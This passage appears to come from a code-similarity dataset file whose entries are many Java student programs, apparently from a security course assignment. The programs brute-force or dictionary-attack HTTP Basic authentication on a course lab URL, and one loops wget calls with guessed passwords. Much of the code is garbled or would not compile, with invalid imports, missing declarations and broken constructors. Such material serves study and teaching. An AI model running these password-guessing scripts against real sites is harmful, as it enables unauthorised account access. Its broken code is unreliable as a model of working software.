\ \n\n } catch (IOException io) {io.printStackTrace();}\n\n }\n \n\
\ public synchronized void run() {\n \n outer : for (int i=0; i<stop;i++)\
\ {\n for (int j=0;j<52;j++) {\n for (int\
\ k=0;k<52;k++) {\n password = passwordLetters[i]+passwordLetters[j]+passwordLetters[k];\n\
\ \t password =\":\"+ password;\n\t\t\t \n\t\t\t\n\t\t\t\n\t\
\t\t while (!(bruteForce.threadF)) {\n\t\t\t try { wait(1); }\n\t\t\t \
\ catch (InterruptedException e){}\n\t\t\t } \n\t\t\t \n\t\t\t if (found)\n\
\t\t\t System.exit(0);\n try { \n\t\t\t \
\ u = (HttpURLConnection)url.openConnection();\n\t\t\t passBase64 = new\
\ url.misc.BASE64Encoder().encode(password.getBytes());\n \
\ u.setRequestProperty(\"Authorization\", \" \" + passBase64);\n\t\t\
\t \n\n\t\t\t\n u.connect();\n\t\t\t\t\n\
\t\t BruteForce.noOfAttempts++;\n\n\t\t if (u.getContentLength()\
\ != 0) {\n\n\t\t if (u.getResponseCode() == HttpURLConnection.HTTP_OK\
\ ) {\n\t\t\t\t found=true;\n\t\t\t\t \n\t\t\t\t \n\t\t\t\t\t\n\t\t\t\t\
\t \n\t\t\t\t\t\n\t\t System.out.println (\"Your User\
\ Name : Password is \"+password+ \n\t\t \" \
\ \"+ \" Found by Thread \"+count);\n\t\t\t\t\tSystem.out.println(\" \");\n\
\t\t\t System.out.println(\" of Attempts / Requests \"+ BruteForce.noOfAttempts);\n\
\t\t\t\t \t \n \t\t System.exit(0);\n\n\t \
\ }\n\t\t }\n\t\t \n\t\t \t\t \n\t \
\ } catch (ProtocolException px) {px.printStackTrace();\n \
\ } catch ( NoRouteToHostException nr){k--; \n\t\t\t nr.printStackTrace();\n\
\ } catch (BindException e){e.printStackTrace();\n\t \
\ } catch (IndexOutOfBoundsException e3){e3.printStackTrace();\n\
\t } catch (IOException io) {io.printStackTrace();\n\t\t\t \n\
\t } finally {u.disconnect();\n\t }\n\t\t\t bruteForce.threadF=false;\n\
\t\t\t bruteForce.threadM=true;\n\t\t\t\n\t\t\t notifyAll();\n\t\t\t\n \
\ }\n\t\t \n }\n System.out.println(\"End\");\n }\n }\n\
}\n\n\nclass PasswordCrackThreadM extends Thread {\n \n \n \n private\
\ String passwordLetters[] ;\n private String password=\" \";\n private static\
\ String userName=\"\";\n private MyHttpURLConnection httpURLConnection;\n\
\ private URL url;\n String passBase64;\n private URLAuthenticator urlAuthenticator\
\ = new URLAuthenticator(userName);\n BruteForce bruteForce;\n int count;\
\ \n private HttpURLConnection u;\n \n int start,stop;\n \n static\
\ boolean found;\n \n \n \n PasswordCrackThreadM(int start,int stop,int\
\ counter,String[]\n passwordLetters,String\
\ userName,BruteForce bruteForce) {\n this.start = start;\n this.stop\
\ = stop;\n this.passwordLetters =passwordLetters;\n this.userName=userName;\n\
\ count =counter;\n this.bruteForce=bruteForce; \n try {\n\t\
\ \n\t url = new URL( \"http://sec-crack.cs.rmit.edu./SEC/2/index.php\"\
);\n\t \n u = (HttpURLConnection)url.openConnection();\n\t \
\ passBase64 = new url.misc.BASE64Encoder().encode(password.getBytes());\n \
\ \n\t u.setRequestProperty(\"Authorization\", \" \" + passBase64);\n\
\n\t \n\n\t \n\t \n\n } catch (IOException io) {io.printStackTrace();}\n\
\n }\n \n public synchronized void run() {\n \n outer : for (int\
\ i=0; i<stop;i++) {\n for (int j=0;j<52;j++) {\n \
\ for (int k=0;k<52;k++) {\n password = passwordLetters[i]+passwordLetters[j]+passwordLetters[k];\n\
\ \t password=\":\"+password;\n\t\t\t\n\t \n\
\t\t\t\n\t\t\t\n\t\t\t while (!(bruteForce.threadM)) {\n\t\t\t try { wait(1);\
\ }\n\t\t\t catch (InterruptedException e){}\n\t\t\t }\n\t\t\t \n\t\
\t\t \n\t\t\t if (found)\n\t\t\t System.exit(0);\n \
\ try { u = (HttpURLConnection)url.openConnection();\n\t\t\t \n \
\ passBase64 = new url.misc.BASE64Encoder().encode(password.getBytes());\n\
\ u.setRequestProperty(\"Authorization\", \"\
\ \" + passBase64);\n\t\t\t \n\n\t\t\t\n \
\ u.connect();\n BruteForce.noOfAttempts++;\n\
\t\t \n\t\t if (u.getContentLength() != 0) {\n\t\
\t\t \n\t\t if (u.getResponseCode() == HttpURLConnection.HTTP_OK\
\ ) {\n\t\t\t\t found=true;\n\t\t\t\t \n\t\t\t\t \n\t\t\t\t\t\n\t\
\t\t\t\t \n\t\t\t\t\t\n\t\t System.out.println (\"Your\
\ User Name : Password is \"+password+ \n\t\t \
\ \" \"+ \" Found by Thread \"+count);\n\t\t\t\t \t \n\t\t\t\t\t \n\t\
\t\t\t\tSystem.out.println(\" \");\n\t\t\t System.out.println(\"\
\ of Attempts / Requests \"+ BruteForce.noOfAttempts);\n \t\t \
\ System.exit(0);\n\n\t }\n\t\t \
\ }\n\t\t \n\t\t \t\t \n\t } catch (ProtocolException\
\ px) {px.printStackTrace();\n } catch ( NoRouteToHostException\
\ nr){k--; \n\t\t\t nr.printStackTrace();\n } catch\
\ (BindException e){e.printStackTrace();\n\t } catch (IndexOutOfBoundsException\
\ e3){e3.printStackTrace();\n\t } catch (IOException io) {io.printStackTrace();\n\
\t\t\t \n\t } finally {u.disconnect();\n\t }\n\
\t\t\t bruteForce.threadF=true;\n\n\t\t\t \n\t\t\t bruteForce.threadM=false;\n\
\t\t\t\n\t\t\t notifyAll();\n\t\t\t\n }\n\t\t \n }\n\
\ System.out.println(\"End\");\n }\n }\n}\n\n\n\n\n\n\n\nclass URLAuthenticator\
\ extends Authenticator {\n private String uName;\n String passwd;\n static\
\ char[] password;\n public URLAuthenticator(String uName) {\n\n this.uName\
\ = uName;\n }\n\n public void setPassword(String passwd) {\n\n\t this.passwd=passwd;\n\
\t password=passwd.toCharArray();\n\n }\n \n public PasswordAuthentication\
\ getPasswordAuthentication() {\n\n\t\n \t\n\t\n\treturn new PasswordAuthentication(uName,password);\n\
\ }\n\n}\n\n\n\n\n \n\nclass MyHttpURLConnection extends HttpURLConnection \
\ {\n public MyHttpURLConnection(URL url) {\n super(url);\n }\n \
\ public void disconnect() {\n }\n\n public boolean usingProxy() {\n \
\ return true;\n }\n public void connect() {\n }\n\n}\n\n"
- source_sentence: "import java.io.*;\nimport java.net.*;\nimport java.*;\nimport\
\ java.Runtime.*;\nimport java.Object.*;\nimport java.util.*;\nimport java.util.StringTokenizer;\n\
import java.net.HttpURLConnection;\n\n\npublic class BruteForce \n{\n String\
\ uname = \"\";\n String pword = \"null\";\n Vector v = new Vector();\n int\
\ runTime;\n \n public void doConnect(String connect, int num)\n {\n \n\
\ String cad = connect;\n \n try\n {\n URL secureSite = new\
\ URL();\n URLConnection connection = secureSite.openConnection();\n\t \n\
\ if (uname != null || pword != null)\n\t {\n\t \n\t for(int i=num;\
\ i<v.size(); i++)\n\t {\n\t pword = (String)v.elementAt(i);\n\t \
\ String up = uname + \":\" + pword;\n String encoding;\n \
\ try\n\t\t{\n\t\t secureSite.misc.BASE64Encoder encoder = (secureSite.misc.BASE64Encoder)\
\ Class.forName(\".misc.BASE64Encoder\").newInstance();\n encoding\
\ = encoder.encode (up.getBytes());\n }\n\t catch (Exception ex)\
\ \n {\n\t\t Base64Converter encoder = new Base64Converter();\n \
\ encoding = encoder.encode(up.getBytes());\n }\n\t connection.setRequestProperty\
\ (\"Authorization\", \" \" + encoding);\n connection.connect();\n \
\ if(connection instanceof HttpURLConnection)\n\t {\n\t HttpURLConnection\
\ httpCon=(HttpURLConnection)connection;\n if(httpCon.getResponseCode()==HttpURLConnection.HTTP_UNAUTHORIZED)\n\
\t\t {\n\t\t System.out.println(\"Not authorized - check for details\" + \"\
\ -Incorrect Password : \" + pword);\n\t\t httpCon.disconnect();\n\t \
\ doConnect(uname, i+1);\n\t }\n\t\telse\n\t\t { \n\t\t System.out.println(\"\
\\n\\n\\nPassword for HTTP Secure Site By BruteForce Attack\");\n \
\ System.out.println( +\"\\tPassword : \"+ pword);\n\t \n \
\ runTime = System.currentTimeMillis() - runTime; \n System.out.println(\"\
Time taken crack password (in seconds)\"+\" : \"+ runTime/1000+\"\\n\"+ \"Tries\
\ taken crack password : \"+ i);\n\t System.exit(0);\n\t }\n\t \
\ }\n\t }\n }\n }\n catch(Exception ex)\n {\n ex.printStackTrace();\n\
\ }\n }\n public Vector getPassword()\n {\n try\n {\n makePasswords\
\ mp = new makePasswords();\n mp.makePass();\n\tmp.loadFile();\n v\
\ = mp.getVector();\n }\n catch(Exception ex)\n {\n ex.printStackTrace();\n\
\ }\n return v;\n }\n public void setTimeTaken( int time_taken)\n {\n\
\ runTime = time_taken;\n } \n public static void main( String args[] )\
\ throws IOException \n {\n \n try\n {\n runTime1 = System.currentTimeMillis();\
\ \n BruteForce newDo = new BruteForce();\n newDo.setTimeTaken(runTime1);\n\
\ newDo.getPassword();\n String site = \"http://sec-crack.cs.rmit.edu./SEC/2/\"\
;\n newDo.doConnect(site, 0);\n }catch(Exception ex)\n {\n System.out.println(\"\
Errrrrrrr\");\n }\n \n\n } \n \n}\n\nclass Base64Converter\n {\n\
\ \n public final char [ ] alphabet = {\n 'A', 'B', 'C',\
\ 'D', 'E', 'F', 'G', 'H', \n 'I', 'J', 'K', 'L', 'M', 'N', 'O',\
\ 'P', \n 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', \n \
\ 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', \n 'g', 'h', 'i',\
\ 'j', 'k', 'l', 'm', 'n', \n 'o', 'p', 'q', 'r', 's', 't', 'u',\
\ 'v', \n 'w', 'x', 'y', 'z', '0', '1', '2', '3', \n \
\ '4', '5', '6', '7', '8', '9', '+', '/' }; \n \n \n public String\
\ encode ( String s )\n {\n return encode ( s.getBytes\
\ ( ) );\n }\n \n public String encode ( byte [ ] octetString\
\ )\n {\n int bits24;\n int bits6;\n \n\
\ char [ ] out\n = new char [ ( ( octetString.length\
\ - 1 ) / 3 + 1 ) * 4 ];\n \n int outIndex = 0;\n int\
\ i = 0;\n \n while ( ( i + 3 ) <= octetString.length ) {\n\
\ \n bits24=( octetString [ i++ ] & 0xFF ) <<\
\ 16;\n bits24 |=( octetString [ i++ ] & 0xFF ) << 8;\n \n \
\ bits6=( bits24 & 0x00FC0000 )>> 18;\n out [\
\ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0003F000\
\ ) >> 12;\n out [ outIndex++ ] = alphabet [ bits6 ];\n \
\ bits6 = ( bits24 & 0x00000FC0 ) >> 6;\n out [ outIndex++\
\ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0000003F );\n\
\ out [ outIndex++ ] = alphabet [ bits6 ];\n }\n\
\ \n if ( octetString.length - i == 2 )\n {\n \
\ \n bits24 = ( octetString [ i ] & 0xFF ) <<\
\ 16;\n bits24 |=( octetString [ i + 1 ] & 0xFF ) << 8;\n \
\ bits6=( bits24 & 0x00FC0000 )>> 18;\n out [ outIndex++\
\ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0003F000 ) >>\
\ 12;\n out [ outIndex++ ] = alphabet [ bits6 ];\n \
\ bits6 = ( bits24 & 0x00000FC0 ) >> 6;\n out [ outIndex++\
\ ] = alphabet [ bits6 ];\n \n \n out [ outIndex++\
\ ] = '=';\n }\n else if ( octetString.length - i ==\
\ 1 )\n {\n \n bits24 = ( octetString\
\ [ i ] & 0xFF ) << 16;\n bits6=( bits24 & 0x00FC0000 )>> 18;\n\
\ out [ outIndex++ ] = alphabet [ bits6 ];\n \
\ bits6 = ( bits24 & 0x0003F000 ) >> 12;\n out [ outIndex++\
\ ] = alphabet [ bits6 ];\n \n \n out [ outIndex++\
\ ] = '=';\n out [ outIndex++ ] = '=';\n }\n \n\
\ return new String ( out );\n }\n }\n \n \n"
sentences:
- "\nimport java.net.*;\nimport java.io.*;\nimport java.misc.*;\n\npublic class\
\ Dictionary\n{\n public static void main (String args[])\n {\n \n \
\ String file = \"/usr/share/lib/dict/words\";\n FileReader fRead;\n \
\ BufferedReader buf;\n\n try\n {\n fRead = new FileReader(file);\n\
\ buf = new BufferedReader(fRead);\n String Password = \"\";\n\
\ int i=0;\n\n \n while( (Password = buf.readLine()) !=\
\ null)\n {\n i++;\n String a = myurl(\"http://sec-crack.cs.rmit.edu./SEC/2\"\
, \"\", Password, i);\n }\n }\n catch(FileNotFoundException\
\ e)\n {\n System.out.println(\"File not found\");\n }\n \
\ catch(IOException ioe)\n {\n System.out.println(\"IO Error \"\
\ + ioe);\n }\n }\n\n public static String encode (String source)\n \
\ {\n BASE64Encoder enc = new source.misc.BASE64Encoder();\n return(enc.encode(source.getBytes()));\n\
\ }\n\n public static String myurl (String url, String Name, String Password,\
\ int val )\n {\n String thisLine;\n String retVal;\n URL u;\n\
\ URLConnection uc;\n retVal = \"\";\n\n try\n {\n \
\ u = new URL(url);\n try\n {\n uc = u.openConnection();\n\
\ if (Name != null)\n {\n uc.setRequestProperty(\"\
Authorization\", \" \" + encode(Name + \":\" + Password));\n }\n \
\ InputStream content = (InputStream)uc.getInputStream();\n \
\ BufferedReader in = new BufferedReader (new InputStreamReader(content));\n\
\n String line;\n \n while ((line = in.readLine())\
\ != null)\n {\n retVal += line;\n System.out.println(line);\n\
\ System.out.println(\"password=\"+Password+\";number:\"+num);\n\
\ System.exit(0);\n }\n }\n catch (Exception\
\ e)\n {\n ;\n \n }\n }\n catch\
\ (MalformedURLException e)\n {\n return(url + \" is not a parseable\
\ URL\");\n }\n return retVal;\n }\n}\n\n\n"
- "\nimport java.util.*;\n\npublic class CrackThread implements Runnable {\n\n \
\ private String strUsername;\n private String strURL;\n private int iSeed;\n\
\ private int iEnd;\n \n \n public CrackThread() {\n }\n \n\
\ public void setParams(String url, String username, int seed, int end) {\n\
\ strUsername = username;\n strURL = url;\n iSeed = seed;\n\
\ iEnd = end;\n }\n \n public void run() {\n Date dtStart,\
\ dtEnd;\n PasswordGen pwd = new PasswordGen();\n PasswordTest tester;\n\
\ int i=1;\n boolean bDone = false;\n Result res;\n\n \
\ dtStart = new Date();\n \n \n pwd.setSeed(iSeed);\n\
\ \n while(!bDone) {\n tester = new PasswordTest(strURL,\
\ strUsername, pwd.getNextPassword());\n \n bDone = tester;\n\
\ i++;\n \n \n if(i % 100 == 0)\n\
\ {\n System.out.println(pwd.getPassword());\n \
\ }\n \n if(bDone) {\n \n \
\ res = new Result(strURL, strUsername, pwd.getPassword(), dtStart, new\
\ Date(), i);\n System.out.print(res.toString());\n \
\ }\n else\n {\n \n }\n \
\ \n \n if( i >= iEnd) bDone = true;\n } \
\ \n }\n \n}\n"
- "\nimport java.io.*;\nimport java.util.*;\n\npublic class BruteForce\n{\n private\
\ Cracker crack;\n private Vector clients;\n private int num;\n private\
\ int bigStart;\n\n public BruteForce()\n {\n int i, j;\n int start,\
\ finish;\n start=finish = 0;\n \n crack = new Cracker();\n \
\ crack.loadLetters();\n crack.loadPairs();\n crack.loadTriples();\n\
\ num = crack.getVictor().size();\n clients = new Vector( num);\n \
\ j = 0;\n \n bigStart = System.currentTimeMillis();\n for(\
\ i = 0; i < num; i++)\n {\n MyClient2 client = new MyClient2(this,\
\ i + 1, 80, (String)crack.getVictor().elementAt( i));\n \n \
\ clients.add( client);\n\t Thread t = new Thread( client);\n\t t.print();\n\
\ j++;\n if(j == 100)\n {\n t = System.currentTimeMillis();\n\
\ System.out.println(\"i = \"+i+\" \"+(String)crack.getVictor().elementAt(\
\ i));\n finish = t;\n while( (finish - t ) < 1000)\n\
\ {\n finish = System.currentTimeMillis();\n \
\ }\n j = 0;\n }\n \n }\n }\n \n public\
\ void retire(int MyClient2 )\n {\n int bigFinish;\n bigFinish = t.getTime();\n\
\ System.out.println(\" It took \"+(bigFinish - bigStart)/1000+\" \"+\"seconds\
\ crack password using brute force\");\n System.exit(0);\n }\n \n \
\ public static void main (String[] args)\n {\n BruteForce = new BruteForce();\n\
\ }\n}\n \n"
- source_sentence: "\n\n\nimport java.io.InputStream;\nimport java.util.Properties;\n\
\nimport javax.naming.Context;\nimport javax.naming.InitialContext;\nimport javax.rmi.PortableRemoteObject;\n\
import javax.sql.DataSource;\n\n\n\n\n\n\npublic class MailsendPropertyHelper\
\ {\n\n\tprivate static Properties testProps;\n\n\tpublic MailsendPropertyHelper()\
\ {\n\t}\n\n\n\t\n\n\tpublic static String getProperty(String pKey){\n\t\ttry{\n\
\t\t\tinitProps();\n\t\t}\n\t\tcatch(Exception e){\n\t\t\tSystem.err.println(\"\
Error init'ing the watchddog Props\");\n\t\t\te.printStackTrace();\n\t\t}\n\t\t\
return testProps.getProperty(pKey);\n\t}\n\n\n\tprivate static void initProps()\
\ throws Exception{\n\t\tif(testProps == null){\n\t\t\ttestProps = new Properties();\n\
\n\t\t\tInputStream fis =\n\t\t\t\tMailsendPropertyHelper.class.getResourceAsStream(\"\
/mailsend.properties\");\n\t\t\ttestProps.load(fis);\n\t\t}\n\t}\n}\n\n\n\n\n\n"
sentences:
- "import java.net.*;\nimport java.util.*;\n\npublic class BruteForce {\n\n public\
\ static void main(String[] args) {\n new CrackAttempt();\n }\n}\n\nclass\
\ CrackAttempt {\n public CrackAttempt() {\n final int MAX_LENGTH = 3;\n\
\ boolean auth = false;\n Date = new Date();\n boolean morePasswords\
\ = true;\n int passPtr = 0;\n StringBuffer validChars = new StringBuffer(\"\
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\");\n char[] password\
\ = new char[MAX_LENGTH];\n\n password[0] = validChars.charAt(0);\n \
\ while (!auth && morePasswords) {\n String resource = \"http://sec-crack.cs.rmit.edu./SEC/2/\"\
;\n try {\n \n Authenticator.setDefault(new CrackAuth(password));\n\
\ URL url = new URL(resource);\n HttpURLConnection conn\
\ = (HttpURLConnection)url.openConnection();\n conn.setRequestMethod(\"\
HEAD\");\n if (conn.getResponseCode() == HttpURLConnection.HTTP_OK)\
\ {\n System.out.println(\"cracked with \" + new String(password));\n\
\ auth = true;\n }\n } catch (Exception e) {\n\
\ System.out.println(\" was exception: \" + e.getMessage());\n \
\ }\n int count = passPtr;\n while (true) {\n \
\ if (password[count] == validChars.charAt(validChars.length() - 1)) {\n \
\ password[count] = validChars.charAt(0);\n count--;\n\
\ } else {\n password[count] = validChars.charAt(validChars.indexOf(String.valueOf(password[count]))\
\ + 1);\n break;\n }\n if (count < 0) {\n\
\ \n if (passPtr < MAX_LENGTH - 1) {\n \
\ passPtr++;\n password[passPtr] = validChars.charAt(0);\n\
\ } else {\n morePasswords = false;\n \
\ }\n break;\n }\n }\n \n }\
\ \n if (!auth) {\n System.out.println(\"Unable determine password\"\
);\n } else {\n time = (new Date()).getTime() - start.getTime();\n\
\ System.out.println(\"it took \" + String.valueOf(time) + \" milliseconds\
\ crack the password\");\n }\n }\n}\n\nclass CrackAuth extends Authenticator\
\ {\n char[] password;\n public CrackAuth(char[] password) {\n this.password\
\ = password;\n }\n\n protected PasswordAuthentication getPasswordAuthentication()\n\
\ {\n String user = \"\";\n return new PasswordAuthentication(user,\
\ password);\n }\n}\n"
- "\n\nimport java.io.*;\nimport java.*;\nimport java.net.*;\nimport java.util.*;\n\
\npublic class Dictionary {\n public static void main (String[] args) throws\
\ IOException {\n BufferedReader stdin = new BufferedReader (new InputStreamReader(System.in));\n\
\n d = new Date().getTime();\n FileReader fr = new FileReader(\"\
/usr/share/lib/dict/words\");\n BufferedReader bufr = new BufferedReader(fr);\n\
\ String word = bufr.readLine(); \n int total = 960;\n\
\ String[] pws = new String[total];\n int count = 0;\n while\
\ (word!=null){\n if (word.length()<=3) { pws[count] = word; count++;}\n\
\tword = bufr.readLine();\n }\n \n int i=0;\n int response\
\ = 0;\n for (i=0;i<count;i++){\n String uname = \"\";\n String\
\ userinfo = uname + \":\" + pws[i];\n try{\n String encoding =\
\ new bf.misc.BASE64Encoder().encode (userinfo.getBytes());\n URL url\
\ = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n HttpURLConnection\
\ uc = (HttpURLConnection)url.openConnection();\n uc.setRequestProperty\
\ (\"Authorization\", \" \" + encoding);\n response = uc.getResponseCode();\n\
\t if (response == 200) break;\n\t else uc.disconnect();\n }\n catch(IOException\
\ e){ System.err.println(e); e.printStackTrace(); } \n catch(IllegalStateException\
\ s){ System.err.println(s); s.printStackTrace(); }\n }\n System.out.println(\"\
Response \"+i+\" was \"+response);\n System.out.println(\"The successful\
\ password was \"+pws[i]);\n finish = new Date().getTime();\n float\
\ totaltime = (float)(finish-d)/1000;\n System.out.println(\"Time taken:\
\ \"+totaltime+ \" seconds.\");\n \n }\n}\n\n"
- " \n\n\n\n\nimport java.util.*;\nimport java.io.*;\n\npublic class MyTimer\n{\t\
\n\n\tpublic static void main(String args[])\n\t{\n\t\tWatchdog watch = new Watchdog();\n\
\t\tTimer time = new Timer();\n\t\ttime.schedule(watch,864000000,864000000);\n\
\t\t\n\t\t\t\n\t}\n}\n"
- source_sentence: "\n\nimport java.io.*;\nimport java.net.*;\nimport java.misc.BASE64Encoder;\n\
\npublic class Dictionary\n{\n public Dictionary()\n {}\n\n public boolean\
\ fetchURL(String urlString,String username,String password)\n {\n StringWriter\
\ sw= new StringWriter();\n PrintWriter pw = new PrintWriter();\n try{\n\
\ URL url=new URL(urlString); \n String userPwd= username+\":\"+password;\n\
\n \n \n \n \n\n BASE64Encoder encoder = new BASE64Encoder();\n\
\ String encodedStr = encoder.encode (userPwd.getBytes());\n System.out.println(\"\
Original String = \" + userPwd);\n\t System.out.println(\"Encoded String = \"\
\ + encodedStr);\n\n HttpURLConnection huc=(HttpURLConnection) url.openConnection();\
\ \n huc.setRequestProperty( \"Authorization\",\" \"+encodedStr); \n\
\ InputStream content = (InputStream)huc.getInputStream();\n BufferedReader\
\ in =\n new BufferedReader (new InputStreamReader (content));\n \
\ String line;\n while ((line = in.readLine()) != null) {\n pw.println\
\ (line);\n System.out.println(\"\");\n System.out.println(sw.toString());\n\
\ }return true;\n } catch (MalformedURLException e) {\n pw.println\
\ (\"Invalid URL\");\n return false;\n } catch (IOException e) {\n \
\ pw.println (\"Error URL\");\n return false;\n }\n\n }\n\n \
\ public void getPassword()\n {\n String dictionary=\"words\";\n String\
\ urlString=\"http://sec-crack.cs.rmit.edu./SEC/2/\";\n String login=\"\"\
;\n String pwd=\" \";\n\n try\n {\n BufferedReader inputStream=new\
\ BufferedReader(new FileReader(dictionary));\n startTime=System.currentTimeMillis();\n\
\ while (pwd!=null)\n {\n pwd=inputStream.readLine();\n \
\ if(this.fetchURL(urlString,login,pwd))\n {\n finishTime=System.currentTimeMillis();\n\
\ System.out.println(\"Finally I gotta it, password is : \"+pwd);\n\
\ System.out.println(\"The time for cracking password is: \"+(finishTime-startTime)\
\ + \" milliseconds\");\n System.exit(1);\n } \n\n }\n\
\ inputStream.close();\n }\n catch(FileNotFoundException e)\n \
\ {\n System.out.println(\"Dictionary not found.\");\n }\n catch(IOException\
\ e)\n {\n System.out.println(\"Error dictionary\");\n }\n }\n\
\n public static void main(String[] arguments)\n {\n BruteForce bf=new BruteForce();\n\
\ bf.getPassword();\n } \n}"
sentences:
- "import java.net.*;\nimport java.io.*;\n\n public class Dictionary {\n int attempts\
\ = 0;\n URLConnection conn = null;\n\n public static void main (String args[]){\n\
\n\tDictionary a = new Dictionary();\n a.attack(args);\n }\n\n public\
\ void attack(String args[]) {\n try {\n String login = new String(\"\"\
);\n String url = new String(\"http://sec-crack.cs.rmit.edu./SEC/2/index.php\"\
);\n String passwd = new String();\n\n\n passwd = getPasswd();\n \
\ BufferedReader in = new BufferedReader( new InputStreamReader (openURLForInput(new\
\ URL(url), login , passwd)));\n\n String line;\n while ((line = in.readLine())\
\ != null) {\n System.out.println(line);\n }\n System.out.println(\"\
Password Cracked Successfully!!!\");\n System.out.println(\"The passsword\
\ is :\" + passwd + \"and got after \" +attempts + \" tries\");\n }\n \
\ catch (IOException e) {\n \n String r = new String(e.getMessage());\n\
\ if ( r != null)\n {\n System.out.println(\"Message :\" +r);\n \
\ Dictionary a = new Dictionary();\n a.attack(args);\n }\n else\n \
\ {\n\tSystem.out.println(\"Trying again\");\n\tDictionary a = new Dictionary();\n\
\ta.attack(args);\n }\n }\n }\n public String getPasswd()\n {\n\n\
\ int i=0;int j=0;\n attempts++;\n int count =0;\n System.out.println(\"Passing\
\ dictionary word and waiting for URL reply....... \");\n String currentword\
\ = \"\";\n String se = \"\";\n try{\n FileInputStream reader = new FileInputStream\
\ (\"words\");\n DataInputStream in = new DataInputStream(reader);\n while (in.available()\
\ !=0)\n{\n currentword = in.readLine();\n count++;\n \n \n }\n }\n catch( IOException\
\ e){}\n\n return currentword;\n\t \n }\n\n\n\n public InputStream openURLForInput\
\ (URL url, String uname, String pword)\n throws IOException {\n conn = url.openConnection();\n\
\ conn.setDoInput (true);\n conn.setRequestProperty (\"Authorization\"\
, userNamePasswordBase64(uname,pword));\n conn.connect ();\n return conn.getInputStream();\n\
\ }\n\n\n public String userNamePasswordBase64(String username, String password)\
\ {\n return \" \" + base64Encode (username + \":\" + password);\n }\n\
\n private final static char base64Array [] = {\n 'A', 'B', 'C', 'D', 'E',\
\ 'F', 'G', 'H',\n 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',\n 'Q',\
\ 'R', 'S', 'T', 'U', 'V', 'W', 'X',\n 'Y', 'Z', 'a', 'b', 'c', 'd', 'e',\
\ 'f',\n 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n',\n 'o', 'p', 'q',\
\ 'r', 's', 't', 'u', 'v',\n 'w', 'x', 'y', 'z', '0', '1', '2', '3',\n \
\ '4', '5', '6', '7', '8', '9', '+', '/'\n };\n\n private static String\
\ base64Encode (String string) {\n String encodedString = \"\";\n byte\
\ bytes [] = string.getBytes ();\n int i = 0;\n int pad = 0;\n while\
\ (i < bytes.length) {\n byte b1 = bytes [i++];\n byte b2;\n \
\ byte b3;\n if (i >= bytes.length) {\n b2 = 0;\n b3\
\ = 0;\n pad = 2;\n }\n else {\n b2 = bytes [i++];\n\
\ if (i >= bytes.length) {\n b3 = 0;\n pad =\
\ 1;\n }\n else\n b3 = bytes [i++];\n \
\ }\n byte c1 = (byte)(b1 >> 2);\n byte c2 = (byte)(((b1 & 0x3)\
\ << 4) | (b2 >> 4));\n byte c3 = (byte)(((b2 & 0xf) << 2) | (b3 >> 6));\n\
\ byte c4 = (byte)(b3 & 0x3f);\n encodedString += base64Array [c1];\n\
\ encodedString += base64Array [c2];\n switch (pad) {\n case\
\ 0:\n encodedString += base64Array [c3];\n encodedString +=\
\ base64Array [c4];\n break;\n case 1:\n encodedString\
\ += base64Array [c3];\n encodedString += \"=\";\n break;\n\
\ case 2:\n encodedString += \"==\";\n break;\n \
\ }\n }\n return encodedString;\n }\n }\n\n"
- "\n\nimport java.io.*;\nimport java.*;\n\npublic class BruteForce \n{\n public\
\ static void main(String args[]) \n {\n String s = null;\n String\
\ basic_url = \"http://sec-crack.cs.rmit.edu./SEC/2/\";\n\n \n String\
\ alphabets = new String(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\
);\n \n String password = null;\n int len = 0;\n int num_tries\
\ = 0;\n\n len = alphabets.length();\n \n \n for (int i=0;\
\ i<len; i++)\n {\n for (int j=0; j<len; j++)\n\t {\n \
\ for (int k=0; k<len; k++)\n\t {\n try \n {\n\
\ \n password = String.valueOf(alphabets.charAt(i))\
\ + String.valueOf(alphabets.charAt(j)) + String.valueOf(alphabets.charAt(k));\n\
\ \n System.out.print(alphabets.charAt(i)); \n\
\ System.out.print(alphabets.charAt(j)); \n \
\ System.out.println(alphabets.charAt(k)); \n\n \n \
\ Process p = Runtime.getRuntime().exec(\"wget --http-user= --http-passwd=\"\
\ + password + \" \" + basic_url);\n \n BufferedReader\
\ stdInput = new BufferedReader(new \n InputStreamReader(p.getInputStream()));\n\
\n BufferedReader stdError = new BufferedReader(new \n \
\ InputStreamReader(p.getErrorStream()));\n\n \n\
\ while ((s = stdInput.readLine()) != null)\n \
\ {\n System.out.println(s);\n }\n \
\ \n \n while ((s = stdError.readLine())\
\ != null)\n {\n System.out.println(s);\n\
\ }\n \n try\n\t\t {\n\
\ p.waitFor(); \n }\n catch\
\ (InterruptedException g) \n {\n } \n\n \
\ num_tries++;\n \n if((p.exitValue())\
\ == 0)\n { \n System.out.println(\"\
**********PASSWORD IS: \" + password);\n\t System.out.println(\"**********NUMBER\
\ OF TRIES: \" + num_tries);\n System.exit(1);\n \
\ }\n }\n catch (IOException e)\n \
\ {\n System.out.println(\"exception happened - here's\
\ what I know: \");\n e.printStackTrace();\n \
\ System.exit(-1);\n }\n }\n }\n }\n \
\ }\n}\n\n"
- "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nimport java.io.*;\n\
import java.net.*;\nimport java.net.URL;\nimport java.net.URLConnection;\nimport\
\ java.util.*;\n\npublic class BruteForce {\n\n public static void main(String[]\
\ args) throws IOException {\n\n \n int start , end, total;\n start\
\ = System.currentTimeMillis(); \n\n String username = \"\";\n String\
\ password = null;\n String host = \"http://sec-crack.cs.rmit.edu./SEC/2/\"\
;\n\n \n \n String letters = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\
;\n int lettersLen = letters.length(); \n int passwordLen=3; \n\n \
\ int passwords=0; \n int twoChar=0; \n\n url.misc.BASE64Encoder\
\ base = new url.misc.BASE64Encoder();\n \n\n \n String authenticate\
\ = \"\"; \n String realm = null, domain = null, hostname = null;\n \
\ header = null; \n\n \n int responseCode;\n String responseMsg;\n\
